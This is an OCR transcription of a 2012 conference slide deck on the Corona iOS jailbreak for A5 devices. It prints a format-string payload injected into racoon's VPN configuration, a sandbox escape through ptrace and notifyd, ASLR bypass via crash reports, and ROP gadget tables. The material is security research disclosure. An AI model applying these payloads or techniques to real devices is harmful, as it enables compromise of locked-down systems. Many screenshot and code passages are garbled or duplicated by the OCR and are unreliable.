

# JAILBREAK DREAMTEAM

#### Nikias Bassen, Cyril, Joshua Hill & David Wang

Hack in the Box - Amsterdam 2012

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#### PART II - A5 CORONA

What are the differences with the A4, and how we managed to jailbreak it

#### Part I summary

- Corona A4 relies on a tethered jailbreak to inject the untethering payload to the fs
- Userland ROP code is started at boot time with a format string bug in the IPSEC racoon service
- ASLR is disabled at bootup for *racoon* with a debugging property of the *launchd* configuration: *DisableASLR*

# Part I summary (2)

- The hfs kernel exploit is done as the root user and out of the racoon sandbox (and this is required)
- Sandbox is skipped by using a modifed version of the racoon binary with the seatbelt profile patched in the entitlements blob of the Mach-O

#### Now A5

- There is no tethered jailbreak on A5 because there is currently no public boot level exploits for it
- As a result, we can't decrypt the kernel (AES keys are disabled when iOS is booted)
- This makes it harder to exploit the kernel and do the actual jailbreak

# Now A5 (2)

- Hopefully, we have found a way to use racoon as an injection vector
- But that implies that we need to get out of the *racoon* sandbox to remount the root filesystem read / write (which is read only on iOS).

### INJECTING THE EXPLOITS

How we managed to get Corona running on A5

#### The Problem

- Need a new injection vector to gain initial code execution
- Corona files need to be copied onto root filesystem to launch on boot
- Root filesystem is read-only

#### More Problems

Address Space Layout Randomization (ASLR)
Application Sandbox Profile

#### What do we need?

- A way to inject commands into the current racoon config
- A way to bypass ASLR to generate our ROP payload

### The Exploit

- VPN Settings isn't validated by configd before being passed to racoon
- Allows us to inject commands into racoon's configuration file through VPN settings
- VPN settings can be modified through MobileBackup2

### Profile Injection

#### /private/var/prefrences/SystemConfiguration/prefrences.plist

168F30ED-AFA2-439E-	Diction	(8 items)
▶ DNS	Diction	(0 items)
UserDefinedName	String	Α
▶ IPv6	Diction	(0 items)
▶ Interface	Diction	(1 item)
▼ IPSec	Diction	(7 items)
SharedSecretEncryption	String	Keychain
LocalIdentifier	String	a
XAuthName	String	";%n%n
AuthenticationMethod	String	SharedSecret
RemoteAddress	String	localhost
LocalIdentifierType	String	KeylD
XAuthEnabled	Number	1
▶ IPv4	Diction	(2 items)
▼ com.apple.payload	Diction	(0 items)
▶ Proxies	Diction	(2 items)
Proxies	Diction	(2 items)
▼ com.apple.payload	Diction	(0 items)
► IFV4	DICTION	

#### Payload Inclusion

Injection limited to 255 characters

We inject "include" command to load the config from another directory

#### Sandbox Bypass

- Sandbox profile allows racoon to read from com.apple.ipsec.plist in preferences directory
- MobileBackup2 allows restores to preferences directories

#### Payload Injection

sainfo address ::1 icr	mp6 address	:::1 icmp6 {	
my_identifier	user_fqdn	"%243u%619\$hhi	n";
my_identifier	user_fqdn	"%11u%625\$hhn	";
my_identifier	user_fqdn	"%244u%619\$hhi	n";
my_identifier	user_fqdn	"%217u%625\$hhi	n";
my_identifier	user_fqdn	"%245u%619\$hhi	n";
my_identifier	user_fqdn	"%186u%625\$hhi	n";
my_identifier	user_fqdn	"%246u%619\$hhi	n";
my_identifier	user_fqdn	"%10u%625\$hhn	";
my_identifier	user_fqdn	"%121u%678\$hhi	n";
my_identifier	user_fqdn	"%242u%619\$hhi	n";
my_identifier	user_fqdn	"%11u%625\$hhn	";
my_identifier	user_fqdn	"%257u%678\$hhi	n";
my_identifier	user_fqdn	"%12u%625\$hhn	";
my_identifier	user_fqdn	"%218u%678\$hhi	n";
my_identifier	user_fqdn	"%13u%625\$hhn	";
my_identifier	user_fqdn	"%218u%678\$hhi	n";
my_identifier	user_fqdn	"%14u%625\$hhn	";
my_identifier	user_fqdn	"%218u%678\$hhi	n";
my_identifier	user_fqdn	"%15u%625\$hhn	";
my_identifier	user_fqdn	"%218u%678\$hhi	n";
my_identifier	user_fqdn	"%16u%625\$hhn	";
my_identifier	user_fqdn	"%138u%678\$hhi	n";
my_identifier	user_fqdn	"%17u%625\$hhn	";
my_identifier	user_fqdn	"%24u%678\$hhn	";
my_identifier	user_fqdn	"%22u%625\$hhn	";
my_identifier	user_fqdn	"%22u%625\$hhn	
my_identifier	user_fqdn	"%24u%678\$hhn	
my_identifier	user_fqdn	"%17u%625\$hhn	
my_ldentlfler	user_rqan		IU., 1

#### Summary

- Command injection into racoon config through configd
- Racoon allows reading from preferences directory
- MobileBackup2 allows writing to preferences directory

# Triggering the VPN connection

- Dialing of IPSec-enabled VPN connection required to launch racoon
- User-friendly solution desired vs. navigation through preferences app

# Triggering the VPN connection

- VPN OnDemand feature!
  - Intended for Certificate-based auth
  - but also works with shared secret auth
- Opening a URL in Safari can trigger VPN
- Typing an address? No!
- Using a WebClip to make it a single tap!

# Triggering the VPN connection

WebClip provisioned together with VPN

 Opens prepared site referencing trigger address

racoon will start and execute the exploit

#### • ASLR

- Libraries slide'd randomly every boot
- Process main binary slide'd on launch
- DisableASLR launchd key not yet usable
- Crash Report service
  - Stores files with detailed info of a crash like backtrace, CPU registers, base addresses, ...

- How to produce a suitable crash report?
- Crash a mobile device service!
- MobileBackup NULL pointer exception
  - Accidentally found during MobileBackup2 service implementation for <u>libimobiledevice.org</u> project

- But how to get the crash report?
- Just do what iTunes does!
- Two services:
  - CrashReportMover: moves reports to specific location
  - CrashReportCopy:AFC service allowing to copy the reports

Parse crash report to get base addresses
Generate a payload for racoon format string vulnerability

## BREAKING OUT OF THE XNU SANDBOX

How Corona defeats Seatbelt to attack the kernel

#### What is the sandbox?

- Code-named Seatbelt.
- Based off the TrustedBSD Mandatory Access Control (MAC) framework.
- MAC framework is how Seatbelt enforces the sandbox policies.

#### MAC Framework

#### How? By hooking into everything when CONFIG\_MACF is enabled at compile-time.

000	Downloads — bash — 120×36
bash	
[-bash(L1/J8/#3)/ttys800 planetbeing01 int mac_audit_check_postselect(kaut int mac_bpfdesc_check_receive(struct int mac_cred_check_label_update(kaut) int mac_cred_check_label_update(kaut) int mac_cred_check_label_update_exa int mac_file_check_visible(kauth_cred int mac_file_check_create(kauth_cred int mac_file_check_create(kauth_cred int mac_file_check_dup(kauth_cred_t) int mac_file_check_fontl(kauth_cred_t) int mac_file_check_get(kauth_cred_t) int mac_file_check_get(kauth_cred_t) int mac_file_check_get(kauth_cred_t) int mac_file_check_get(kauth_cred_t) int mac_file_check_lock(kauth_cred_t) int mac_file_check_lock(kauth_cred_t) int mac_file_check_lock(kauth_cred_t) int mac_file_check_lock(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_file_check_set(kauth_cred_t) int mac_inpb_check_deliver(struct) int mac_inpb_check_deliver(struct) int mac_iokit_check_set_properties( int mac_iokit_check_label_update(str int mac_iokit_check_label_update(str int mac_mount_check_label_update(str int mac_mount_check_label_update(str int mac_mount_check_label_update(str int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte) int mac_mount_check_setattr(vfs_conte)	<pre>le:~/Downloads]\$ grep "mac.*_check_[a-z_]*" mac_framework.h h.cred_t cred, unsigned short syscode,cred_t cred, unsigned short syscode,cred_t cred, struct ifnet *ifp); th_cred_t cred, struct fileglob *fg; th_cred_t cred, struct fileglob *fg); dit cred); cred, struct fileglob *fg, int newfd); [t cred, struct fileglob *fg, int cmd, cred, struct fileglob *fg; t cred, struct fileglob *fg; scred, struct mount *mbuf, impcb *inp, struct moul *mbuf, impcb *inp, struct mount *mp; scred_t cred, io_object_t registry_entry, io_object_t properties); st_t_cred_t cred; scred_t cred, struct mount *mp; scred_t cred, struct mount *mp; ext_t ctx, struct mount *mp; ext_t ctx, struct mount *mp;</pre>
Int mac_pipe_check_iocti(kauth_cred	Lt cred, struct pipe *cpipe,
int moc_mount_check_remount(vfs_cor int moc_mount_check_setattr(vfs_cor int moc_mount_check_stat(vfs_contex int moc_mount_check_umount(vfs_cont int moc_pipe_check_iocti(kauth_cred	itext_t ctx, struct mount *mp); itext_t ctx, struct mount *mp, :t_t ctx, struct mount *mp); .ext_t ctx, struct mount *mp); [t cred, struct pipe *cpipe,

#### MAC Framework

- Make any relevant kernel interface call check before performing an action:
  - audit, bpfdesc, cred, file, ifnet, inpcb, iokit, lctx, mount, pipe, posixsem, proc, socket, system, sysvmsq, vnode
- Any action has to be authorized with all registered policies. Policy has a function for every hook.

#### Sandbox.kext

- A registered MAC policy.
- Processes can opt-in through sandbox API calls, entitlements, or be forced.
- Profiles managed by sandboxd, which the kernel communicates with.
- Profiles are like compiled TinyScheme programs

;; OriginatingProject: ipsec (version 1) (deny default) (allow system-socket sysctl-read sysctl-write) (allow ipc-posix\* (ipc-posix-name "com.apple.securityd")) (allow ipc-posix-shm (ipc-posix-name "apple.shm.notification\_center") (ipc-posix-name "com.apple.AppleDatabaseChanged")) (allow file-read\* file-ioctl (subpath "/private/etc/master.passwd") (subpath "/private/var/run/racoon") (literal "/private/var/preferences/SystemConfiguration/com.apple.ipsec.plist") (subpath "/private/etc/racoon")) (allow file-read\* (subpath "/Library/Managed\ Preferences") (subpath "/Library/Preferences") (subpath "/private/var/root") (literal "/private/var/db/mds/messages/se\_SecurityMessages")) (allow file-write\* (literal "/private/var/run/racoon.sock") (literal "/private/var/run/racoon.pid")) (allow file\* (literal "/var/log/racoon.log") (literal "/private/var/log/racoon.log")) (allow iokit-open (iokit-user-client-class "RootDomainUserClient")) (allow network-outbound (subpath "/private/var/tmp/launchd")) (allow network\* (local udp "\*:500" "\*:4500") (remote udp "\*:\*") (literal "/private/var/run/racoon.sock")) (allow file\* (literal "/Library/Keychains/System.keychain") (literal "/private/var/db/mds/system/mdsObject.db") (literal "/private/var/db/mds/system/mds.lock") (literal "/private/var/db/mds/system/mdsDirectory.db")) (allow mach-lookup (global-name "com.apple.SecurityServer") (global-name "com.apple.ocspd")) (global-name "com.apple.ocspd"))

(allow file-read\* (require-all (file-mode #o0004) (require-any (subpath "/System") (subpath "/usr/lib") (subpath "/usr/sbin") (subpath "/usr/share")))) (allow file-read-metadata (literal "/etc") (literal "/tmp") (literal "/var")) ;;; Allow access to standard special files. (allow file-read\* (literal "/private/var/db/timezone/localtime") (literal "/dev/random") (literal "/dev/urandom")) (allow file-read\* file-write-data (literal "/dev/null") (literal "/dev/zero")) (allow file-read\* file-write-data file-ioctl (literal "/dev/aes\_0") (literal "/dev/sha1\_0") (literal "/dev/dtracehelper")) (allow network-outbound (literal "/private/var/run/asl\_input") (literal "/private/var/run/syslog")) ;;; Allow IPC to standard system agents. (allow mach-lookup (global-name "com.apple.securityd") (global-name "com.apple.bsd.dirhelper") (global-name "com.apple.system.DirectoryService.libinfo\_v1") (global-name "com.apple.system.DirectoryService.membership\_v1") (global-name "com.apple.system.logger") (global-name "com.apple.system.notification\_center")) (global-name "com.apple.system.notification\_center"))

;;; Allow read access to standard system paths.

#### Racoon's Sandbox

- Why do we care? We're root!
- Then, how did we manage it for the untether?

000	) 🏠 planetbeing —	ssh — 79×19 ≝ <sup>™</sup>
	ssh	
Sigrid:~ xml ver<br br /Property <plist ver<br=""><dict></dict></plist>	root# ldid -e /usr/sbin/racoon   rsion="1.0" encoding="UTF-8"?> E plist PUBLIC "-//Apple//DTD PLI /List-1.0.dtd"> ersion="1.0">	grepcolor -E "seatbelt[a-z-]* \$" ST 1.0//EN" "http://www.apple.com/DTDs
	dkey>keychain-access-groups	
	darray>	
	<string>apple</string>	
	<pre>-cstring&gt;com.apple.certifi</pre>	cates
	<pre>string&gt;com.apple.identit</pre>	ies
	<pre>key&gt;seatbelt_profiles</pre>	
	<array></array>	
	<string>racoon</string>	
  Sigrid:~	root#	
Sigrid:~	root#	

#### Racoon's Sandbox

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00	) 👚 planetbeing —	ssh — 79×19 ≝ <sup>™</sup>
	ssh	
Sigrid:~ xml ve<br DOCTYP<br /Propert <plist v<br=""><dict></dict></plist>	root# ldid _e /usr/sbin/corona   rsion="1.0" encoding="UTF-8"?> E plist PUBLIC "_//Apple//DTD PLI yList-1.0.dtd"> ersion="1.0">	grepcolor -E "seatbelt[a-z3-]* \$" ST 1.0//EN" "http://www.apple.com/DTDs
	<pre>devokeychain-access-groups</pre>	
	«array»	
	<pre><string>apple</string> <string>com.apple.certifi</string></pre>	cates
	<pre></pre>	ies
	<pre>key&gt;seatbelt_profil3s</pre>	
	<array></array>	
	<pre><string>racoon</string></pre>	
  Sigrid:~		
Sigrid:~	root#	

#### Done?

 Need a way to get a patched copy of racoon onto the device.

 Need a way to convince the iPhone to run that copy with our exploit config.



#### Done?

<pre>sh Sigrid:~ root# cot /usr/share/corona/jb.plist <?xml version="1.0" ssh Sigrid:~ root# cot /usr/share/corona/jb.plist <?xml version="1.0" dicts deysLabeLC "~//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> plist version="1.0" dicts deysLabeL</pre> <pre> dicts </pre> <pre> dicts deysLabeL</pre> <pre> dicts </pre> <pre> </pre> <pre> dicts </pre> </th <th>0.0</th> <th></th> <th>A alarathaing ash 100.22</th>	0.0		A alarathaing ash 100.22
<pre>ssh Sigrid:~ root# cot /usr/share/corona/jb.plist <?xml version="1.0" encoding="UTF-8"?> <!--OOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"--> eplist version="1.0" <dicts <keyslobel<="" <strings-jb<="" keys="" string=""> <strings-jb< string=""> <strings-jb< string=""> <strings-jb< string=""> <strings-f< string=""> <strings-f< string=""> <strings corona<="" share="" string="" usr=""> <strings co<="" corona<="" share="" strings="" td="" usr=""><td></td><td></td><td></td></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings></strings-f<></strings-f<></strings-jb<></strings-jb<></strings-jb<></dicts></pre>			
<pre>Sigrid:~ root# cdt /usr/share/corona/jb.plist <??ml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.8//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">     plist version="1.0" dicts</pre>		ssh	
<pre></pre> <pre>&lt;</pre>	Sigrid:~ xml ve:<br DOCTYPI<br <plist v<br=""><dict></dict></plist>	root# cat /usr/share/corona rsion="1.0" encoding="UTF-8" E plist PUBLIC "-//Apple//DT ersion="1.0"> <key>Label</key> <string>jb</string> <key>ProgramArguments</key> <array> <string>/usr/sbin/cd <string>racoon-explo </string></string></array> <key>WorkingDirectory</key> <string>/usr/share/corona/ <key>RunAtLoad</key> <true></true> <key>LaunchOnlyOnce</key> <true></true> <key>DisableAslr</key></string>	//jb.plist ?> D PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> wrona wit.conf /string>
<pre>      </pre>	 		
	 	<true></true> ≮ey>DisableAslr <true></true>	

#### What can we do?

- We can convince the default version of racoon to run with an exploit config that we restore using MobileBackup.
- We only need to get out of the sandbox while executing as racoon.

#### The ptrace hole

- Debugging normally requires task\_for\_pid and ptrace; ptrace is actually unrestricted.
- What can we do with ptrace? Possibly control an unsandboxed process!

```
if (uap->req == PT_ATTACH) {
        int
                        err;
        if ( kauth authorize process(proc ucred(p), KAUTH PROCESS CANTRACE,
                                                                  t, (uintptr_t)&err, 0, 0) == 0 ) {
                /* it's OK to attach */
                proc lock(t);
                SET(t->p lflag, P LTRACED);
                if (tr sigexc)
                        SET(t->p lflag, P LSIGEXC);
                t->p oppid = t->p ppid;
                /* Check whether child and parent are allowed to run modified
                 * code (they'll have to) */
                proc unlock(t);
                cs allow invalid(t);
                cs_allow_invalid(p);
                if (t->p_pptr != p)
                        proc_reparentlocked(t, p, 1, 0);
                proc lock(t);
                if (get task userstop(task) > 0 ) {
                        stopped = 1;
                t \rightarrow p xstat = 0;
                proc unlock(t);
                psignal(t, SIGSTOP);
                /*
                 * If the process was stopped, wake up and run through
                 * issignal() again to properly connect to the tracing
                 * process.
                 */
                if (stopped)
                        task resume(task);
                error = 0;
                goto out;
        }
        else {
                /* not allowed to attach, proper error code returned by kauth authorize process */
                if (ISSET(t->p_lflag, P_LNOATTACH)) {
                        psignal(p, SIGSEGV);
                }
                        psignal(p, SIGSEGV);
                if (ISSET(t->p_lflag, P_LNOATTACH)) {
                /* not allowed to attach, proper error code returned by kauth authorize process */
```

```
static int
kauth_authorize_process_callback(kauth_cred_t credential, __unused void *idata, kauth_action_t action,
    uintptr_t arg0, uintptr_t arg1, unused uintptr_t arg2, unused uintptr_t arg3)
ł
        switch(action) {
        CASE KAUTH PROCESS CANSIGNAL:
                panic("KAUTH PROCESS CANSIGNAL not implemented");
                /* XXX credential wrong here */
                /* arg0 - process to signal
                 * arg1 - signal to send the process
                 */
                if (cansignal(current_proc(), credential, (struct proc *)arg0, (int)arg1, 0))
                        return(KAUTH RESULT ALLOW);
                break;
        CASE KAUTH PROCESS CANTRACE:
                /* current proc() - process that will do the tracing
                 * arg0 - process to be traced
                 * argl - pointer to int - reason (errno) for denial
                 */
                if (cantrace(current proc(), credential, (proc_t)arg0, (int *)arg1))
                        return(KAUTH RESULT ALLOW);
                break;
        /* no explicit result, so defer to others in the chain */
        return(KAUTH RESULT DEFER);
}
}
        return(KAUTH_RESULT_DEFER);
        /* no explicit result, so defer to others in the chain */
```

```
int
cantrace(proc_t cur_procp, kauth_cred_t creds, proc_t traced_procp, int *errp)
        int
                        my err;
        /*
         * You can't trace a process if:
                (1) it's the process that's doing the tracing,
         *
         */
        if (traced procp->p pid == cur procp->p pid) {
                *errp = EINVAL;
                return (0);
        }
        /*
         *
                (2) it's already being traced, or
         */
        if (ISSET(traced_procp->p_lflag, P_LTRACED)) {
                *errp = EBUSY;
                return (0);
        }
        /*
         *
                (3) it's not owned by you, or is set-id on exec
         *
                    (unless you're root).
         */
        if ((creds->cr ruid != proc ucred(traced procp)->cr ruid ||
                ISSET(traced_procp->p_flag, P_SUGID)) &&
                (my_err = suser(creds, &cur_procp->p_acflag)) != 0) {
                *errp = my err;
                return (0);
        }
        if ((cur_procp->p_lflag & P_LTRACED) && isinferior(cur_procp, traced_procp)) {
                *errp = EPERM;
                return (0);
        }
        if (ISSET(traced_procp->p_lflag, P_LNOATTACH)) {
                *errp = EBUSY;
                return (0);
        }
        return(1);
        return(1);
```

} }

7

return (0);

{

#### The ptrace hole

- gdb on OS X is heavily dependent on Mach calls, not ptrace like BSD. So ptrace is unguarded, but very few things actually work.
- What can we do?

```
/* continue the child */
        case PT CONTINUE:
                proc unlock(t);
                th act = (thread_t)get_firstthread(task);
                if (th act == THREAD NULL) {
                        error = EINVAL;
                        goto out;
                }
                if (uap->addr != (user_addr_t)1) {
#if defined(ppc)
#define ALIGNED(addr,size)
                                 (((unsigned)(addr)&((size)-1))==0)
                        if (!ALIGNED((int)uap->addr, sizeof(int)))
                                 return (ERESTART);
#undef ALIGNED
#endif
                        thread setentrypoint(th act, uap->addr);
                }
                if ((unsigned)uap->data >= NSIG) {
                        error = EINVAL;
                        goto out;
                }
                if (uap->data != 0) {
                        psignal(t, uap->data);
                }
                if (uap->req == PT STEP) {
                        /*
                          * set trace bit
                          */
                        if (thread_setsinglestep(th_act, 1) != KERN_SUCCESS) {
                                 error = ENOTSUP;
                                goto out;
                        }
                } else {
                         /*
                          * clear trace bit if on
                          */
                        if (thread_setsinglestep(th_act, 0) != KERN_SUCCESS) {
                                 error = ENOTSUP;
                                goto out;
                        }
                }
                                goto out;
```

#### Limitations?

- We can only control the "first" thread.
- We can only control PC
- We can't switch between ARM and THUMB.

_	_						
				100_80079	BAC	_	
00	00	A0	E3	MOV		RO,	*0
<b>B</b> 8	14	99	E5	LDR		R1,	[R9,#0x4B8]
14	21	91	E5	LDR		R2,	[R1,#0x114]
<b>B</b> 0	34	99	E5	LDR		R3,	[R9,#0x4B0]
03	00	52	E1	CMP		R2,	R3
14	01	81	05	STREQ		RO,	[R1,#0x114]
04	01	83	E5	STR		RO,	[R3,#0x104]
01	0B	89	E2	ADD		RO,	R9, #0x400
<b>A</b> 0	00	80	E2	ADD		RO,	R0, #0xA0
BO	04	89	E5	STR		RO,	[R9, #0x4B0]
4F	02	00	EB	BL		sub	8007A518
10	0A	F8	EE	VMRS		RO.	FPEXC
01	01	10	<b>E</b> 3	TST		RO.	#0x40000000
40	0A	80	0E	VMOVEO, F3	2	50	50
85	DF	89	E2	ADD		SP	R9. #0x238
40	40	90		LDR		BA	(SP #0x401
	-	68	-1	MCD		eper	ar, toxed
1.				CLBEY		arai	CABL, RY
1.				CLREA			
0.0		20	23	SEV			
30	EO	90	55	LDR		LR,	[SP, #0x3C]
**		DD	ES	LDMFD		sP,	{RO-LR}
00	00	A0	E1	NOP			
0E	FO	BO	E1	MOVS		PC,	LR
				; End of	function	on th	hread_exception_return
				i gug or	IUNCEI	00 .61	aread_exception_return
OF	B.O.	RO	RT	NOAS		5C1	TH
00	00	YO	ET	ROS		30	A STATE OF THE OWNER OF THE OWNER OF
	the second se	and the second se	the second se				

#### How to use this for evil

- Racoon is root, so we can manipulate any other process, including non-sandboxed ones!
- We can control PC, so maybe we can use ROP.
  - For ROP to work, we need to control stack at the point we change PC.

## notifyd

- Almost all processes can talk to notifyd to use Apple's notification system notify(3).
- Also have access to shm; we can then load an arbitrarily large stack and pivot to it.
- Can get stuff onto its stack via Mach IPC.
- Can also make it block deterministically with our stuff on the stack.

;; OriginatingProject: ipsec (version 1) (**deny default**) (allow system-socket sysctl-read sysctl-write)

(allow ipc-posix\* (ipc-posix-name "com.apple.securityd"))
(allow ipc-posix-shm
 (ipc-posix-name "apple.shm.notification\_center")
 (ipc-posix-name "com.apple.AppleDatabaseChanged"))

(allow file-read\* file-ioctl
 (subpath "/private/etc/master.passwd")
 (subpath "/private/var/run/racoon")
 (literal "/private/var/preferences/SystemConfiguration/com.apple.ipsec.plist")
 (subpath "/private/etc/racoon"))

(allow file-read\*
 (subpath "/Library/Managed\ Preferences")
 (subpath "/Library/Preferences")
 (subpath "/private/var/root")
 (literal "/private/var/db/mds/messages/se\_SecurityMessages"))

```
(allow file-write*
   (literal "/private/var/run/racoon.sock")
   (literal "/private/var/run/racoon.pid"))
```

```
(allow file*
```

(literal "/var/log/racoon.log")
(literal "/private/var/log/racoon.log"))

(allow iokit-open (iokit-user-client-class "RootDomainUserClient"))

(allow network-outbound (subpath "/private/var/tmp/launchd"))
(allow network\*
 (local udp "\*:500" "\*:4500")
 (remote udp "\*:\*")
 (literal "/private/var/run/racoon.sock"))

#### (allow file\*

(literal "/Library/Keychains/System.keychain") (literal "/private/var/db/mds/system/mdsObject.db") (literal "/private/var/db/mds/system/mds.lock") (literal "/private/var/db/mds/system/mdsDirectory.db"))

(allow mach-lookup

(global-name "com.apple.SecurityServer")
(global-name "com.apple.ocspd"))

```
illow mach-lookup
  (global-name "com.apple.SecurityServer")
  (global-name "com.apple.ocspd"))
```

;;; Allow read access to standard system paths.

(allow file-read-metadata (literal "/etc") (literal "/tmp") (literal "/var"))

;;; Allow access to standard special files.

(allow file-read\*
 (literal "/private/var/db/timezone/localtime")
 (literal "/dev/random")
 (literal "/dev/urandom"))

(allow file-read\* file-write-data (literal "/dev/null") (literal "/dev/zero"))

(allow file-read\* file-write-data file-ioctl (literal "/dev/aes\_0") (literal "/dev/sha1\_0") (literal "/dev/dtracehelper"))

(allow network-outbound (literal "/private/var/run/asl\_input") (literal "/private/var/run/syslog"))

;;; Allow IPC to standard system agents.

(allow mach-lookup (global-name "com.apple.securityd") (global-name "com.apple.bsd.dirhelper") (global-name "com.apple.system.DirectoryService.libinfo\_v1") (global-name "com.apple.system.DirectoryService.membership\_v1") (global-name "com.apple.system.logger") (global-name "com.apple.system.notification\_center"))

(global-name "com.apple.system.DirectoryService.membership\_v1") (global-name "com.apple.system.logger") (global-name "com.apple.system.notification\_center"))

```
char rbuf[sizeof(notify_request_msg) + MAX_TRAILER_SIZE];
char sbuf[sizeof(notify_reply_msg) + MAX_TRAILER_SIZE];
```

#### forever

£

```
memset(rbuf, 0, sizeof(rbuf));
memset(sbuf, 0, sizeof(sbuf));
```

```
request = (notify_request_msg *)rbuf;
reply = (notify_reply_msg *)sbuf;
```

```
request->head.msgh_local_port = global.server_port;
request->head.msgh_size = global.request_size;
```

```
rbits = MACH_RCV_MSG | (blocking ? 0 : MACH_RCV_TIMEOUT) | MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_AUDIT) | MACH_RCV_TRAILER_AUDIT) | MACH_RCV_TR
```

```
status = mach_msg(&(request->head), rbits, 0, global.request_size, global.server_port, 0, MACH_PORT_NULL);
if (status != KERN_SUCCESS) return;
```

#### ET\_OS\_EMBEDDED

```
/* Synchronize with work_g since on embedded main() calls this
 * from the global concurrent queue. */
dispatch_sync(global.work_g, ^{
    status = notify_ipc_server(&(request->head), &(reply->head));
});
status = notify_ipc_server(&(request->head), &(reply->head));
if (!status && (request->head.msgh_bits & MACH_MSGH_BITS_COMPLEX))
{
    /* destroy the request - but not the reply port */
    request->head.msgh_remote_port = MACH_PORT_NULL;
    mach_msg_destroy(&(request->head));
}
```

if (reply->head.msgh\_remote\_port)

```
status = mach_msg(&(reply->head), sbits, reply->head.msgh_size, 0, MACH_PORT_NULL, 0, MACH_PORT_NULL);
if (status == MACH_SEND_INVALID_DEST || status == MACH_SEND_TIMED_OUT)
```

```
/* deallocate reply port rights not consumed by failed mach_msg() send */
mach_msg_destroy(&(reply->head));
```

-

}

}

#### Exploit

- Generated by a ROP generation program that writes a stack in the form of format strings.
- Has functions which are macros for common ROP expressions: call function with n args, load register from memory, store register to memory, etc.

#### Exploit

- Create non-sandboxed version of racoon and put it in a place we can write/chmod.
- Find notifyd PID.
- Put notifyd's main thread on the IPC thread.
- Block notifyd with our exploit IPC message.
- Write rest of ROP stack to shm.
- Launch the exploit.

# A closer look at the notifyd ROP stack

The painful search for ARM gadgets.
Wait a minute, isn't notifyd in THUMB?

• First gadget needed: Jump to a THUMB location we can pick.

## GADGET\_HOLY

- For replies, even if the request is invalid, msgh\_id is request.msgh\_id + 100
- We happen to find a gadget that sets PC to precisely where reply's msgh\_id is (sbuf.msgh\_id) thanks to Jay Freeman.
  - POP can do an ARM/THUMB switch

	/System/Library	/PrivateFramewor	ks/Video	Toolbox.framework/VideoToolbox
	vt_Copy_420f_42	0v_arm+0x220		
	35982100	e28dd008	add	sp, sp, #8 @ 0x8
l	35982104	ecbd8b08	vldmia	sp!, {d8-d11}
	35982108	ecbdcb08	vldmia	sp!, {d12-d15}
l	3598210c	e8bd0d00	рор	{r8, sl, fp}
	35982110	e8bd80f0	рор	{r4, r5, r6, r7, pc}

SP	Function	Label	Value
$SP + 0 \times 00$	mach msg trap	saved r4	???
SP + 0x04	mach msg trap	saved r5	???
SP + 0x08	mach msg trap	saved r6	???
SP + 0x0C	mach msg trap	saved r8	???
$SP + 0 \times 10$	mach msg	???	???
SP + 0x14	mach msg	???	???
SP + 0x18	mach msg	???	???
SP + 0x1C	mach msg	???	???
SP + 0x20	mach msg	???	???
SP + 0x24	mach msg	saved r8	???
SP + 0x28	mach msg	saved r10	???
SP + 0x2C	mach msg	saved rll	???
SP + 0x30	mach msg	saved r4	
SP + 0x34	mach msg	saved r5	???
SP + 0x38	mach msg	saved r6	???
SP + 0x3C	mach msg	saved r7	??? <b>***</b> *******************************
SP + 0x40	mach msg	saved Ir	
SP + 0x44	service mach message		
SP + 0x48	service mach message	???	???
SP + 0x4C	service mach message	???	???
SP + 0x50	service mach message	sbuf.msgh bits	???
SP + 0x54	service mach message	sbuf. msgh size	0x24
SP + 0x58	service mach message	sbuf.msgh remote port	racoon's port
SP + 0x5C	service mach message	sbuf.msgh local port	notifyd's port
SP + 0x60	service mach message	sbuf. msgh reserved	0
SP + 0x64	service mach message	sbuf. msgh id	ADD SP 120 POP8 10 4567
SP + 0x68	service mach message	sbuf. NDR record t	???
SP + 0x6C	service mach message	sbuf. NDR record t	???
SP + 0x70	service mach message	sbuf. data 0	MIG BAD ID
SP + 0x74	service mach message	sbuf. data 4	???
SP + 0x78	service mach message	sbuf. data 8	???
SP + 0x7C	service mach message	sbuf. data c	???
SP + 0x80	service mach message	sbuf. data 10	???

SP	Function	Label	Value
SP - 0x68	mach msg trap	saved r4	???
SP - 0x64	mach msg trap	saved r5	???
SP - 0x60	mach msg trap	<b>d8</b>	???
SP - 0x5C	mach msg trap	<b>d8</b>	???
SP - 0x58	mach msg	d9	???
SP - 0x54	mach msg	d9	???
SP - 0x50	mach msg	d10	???
SP - 0x4C	mach msg	d10	???
SP - 0x48	mach msg	dll	???
SP - 0x44	mach msg	dll	???
SP - 0x40	mach msg	d12	???
SP - 0x3C	mach msg	d12	???
SP - 0x38	mach msg	dl3dmillionada	
SP - 0x34	mach msg	d13	???
SP - 0x30	mach msg	d14	
SP - 0x2C	mach msg	dl4	
SP - 0x28	mach msg	dl5-dl5-dl5-dl5-dl-	
SP - 0x24	service mach message	i se e cours di <b>s</b> com e come	
SP - 0x20	service mach message	r8	???
SP - 0x1C	service mach message	si s	???
SP - 0x18	service mach message	fp	???
SP - 0x14	service mach message		0x24
SP - 0x10	service mach message	r5	racoon's port
SP - 0x0C	service mach message	r6	notifyd's port
SP - 0x08	service mach message	r7	0
SP - 0x04	service mach message	PC	ADD SP 120 POP8 10 4567
SP + 0x00	service mach message	sbuf. NDR record t	???
SP + 0x04	service mach message	sbuf. NDR record t	???
